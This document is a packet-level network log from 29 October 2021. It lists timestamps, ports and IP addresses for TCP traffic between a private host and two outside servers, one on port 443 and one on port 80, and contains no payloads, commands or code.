Oct 29, 2021 20:50:00.267266035 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267277002 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267297983 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267306089 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267319918 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267330885 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267362118 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267374039 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267384052 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267405033 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267416000 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267460108 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267468929 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267482996 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267508984 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267517090 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267543077 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267632961 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267683983 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267692089 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267746925 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267757893 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.283579111 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.283699989 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.283725977 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.283776045 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.283934116 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.283993006 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284032106 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284086943 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284130096 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284214973 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284230947 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284239054 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284279108 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284300089 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284339905 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284401894 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284471989 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284531116 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284583092 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284625053 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284657001 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284665108 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284691095 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284719944 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284738064 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284791946 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284807920 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284813881 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284835100 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284877062 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284882069 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284908056 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.284909010 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.284953117 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.285013914 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.285022974 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.285084963 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.285132885 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.288918018 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:01.279589891 CEST	49809	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.335083961 CEST	80	49809	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.335258007 CEST	49809	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.335403919 CEST	49809	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.335416079 CEST	49809	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.417634964 CEST	80	49809	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.417958021 CEST	49809	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.417987108 CEST	49809	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.447505951 CEST	49812	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.473323107 CEST	80	49809	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.500946045 CEST	80	49812	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.501106977 CEST	49812	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.501260042 CEST	49812	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.502015114 CEST	49812	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.554912090 CEST	80	49812	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.555239916 CEST	80	49812	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.585293055 CEST	80	49812	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.585385084 CEST	49812	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.585589886 CEST	49812	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.638710022 CEST	80	49812	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.884637117 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.938514948 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:01.938661098 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.938781977 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:01.938801050 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.021753073 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.021785021 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.021799088 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.021811962 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.021828890 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.021846056 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.021903992 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.021939039 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.021961927 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.021981001 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.021996975 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.022015095 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.022023916 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.022058964 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.075880051 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.075911999 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.075928926 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.075947046 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.075977087 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076015949 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076153040 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076174974 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076190948 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076208115 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076234102 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076262951 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076483011 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076503992 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076519012 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076535940 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076549053 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076579094 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076581955 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076596022 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076641083 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076699972 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076718092 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076747894 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076764107 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076790094 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076817036 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076817989 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.076833963 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.076879025 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129328012 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129364014 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129380941 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129398108 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129414082 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129430056 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129447937 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129448891 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129465103 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129478931 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129483938 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129501104 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129523039 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129549026 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129559040 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129576921 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129595995 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129614115 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129616976 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129631996 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129652977 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129673958 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129714966 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129731894 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129748106 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129756927 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129766941 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129801989 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129825115 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129842043 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129849911 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129859924 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129877090 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.129884005 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.129923105 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.130443096 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130470991 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130489111 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130502939 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130594969 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.130772114 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130793095 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130834103 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.130886078 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130903006 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130937099 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130947113 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.130955935 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.130995989 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.131059885 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.131077051 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.131093979 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.131110907 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.131144047 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.131160021 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.131350994 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.131371021 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.131429911 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.182742119 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182773113 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182789087 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182806015 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182821035 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182838917 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182856083 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182854891 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.182873011 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182903051 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.182921886 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.182931900 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.182954073 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183008909 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.183022976 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183041096 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183057070 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183074951 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183088064 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.183111906 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.183141947 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183160067 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183175087 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183192015 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183198929 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.183243036 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.183543921 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183567047 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183583975 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183600903 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.183651924 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.183660030 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.184256077 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.184283018 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.184298992 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.184314013 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.184350967 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.184369087 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185301065 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185328960 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185345888 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185362101 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185388088 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185425997 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185516119 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185566902 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185585022 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185600996 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185627937 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185657024 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185713053 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185754061 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185770988 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185787916 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185796976 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185817003 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185832977 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185833931 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185851097 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185867071 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185874939 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185911894 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185919046 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185936928 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185954094 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185971022 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.185978889 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.185986996 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.186002970 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.186012030 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.186058044 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236144066 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236172915 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236191988 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236210108 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236232996 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236246109 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236251116 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236275911 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236294031 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236318111 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236356974 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236361027 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236376047 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236393929 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236413956 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236462116 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236515045 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236521959 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236541033 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236557007 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236573935 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236599922 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236619949 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236635923 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236700058 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236710072 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.236917019 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236938000 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236955881 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.236999989 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.237031937 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.237056017 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.237610102 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.237627029 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.237643957 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.237660885 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.237674952 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.237710953 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.238626957 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.238652945 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.238687038 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.238702059 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.238729954 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.238764048 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.238815069 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.238851070 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.238871098 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.238895893 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.238898993 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.238948107 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.239065886 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239084959 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239106894 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239125013 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239139080 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.239144087 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239176035 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239185095 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.239207983 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.239212036 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239232063 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239286900 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.239298105 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239316940 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239332914 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239348888 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239373922 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.239415884 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.239444017 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239460945 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.239500046 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290271997 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290309906 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290324926 CEST	80	49814	185.98.87.159	192.168.2.4
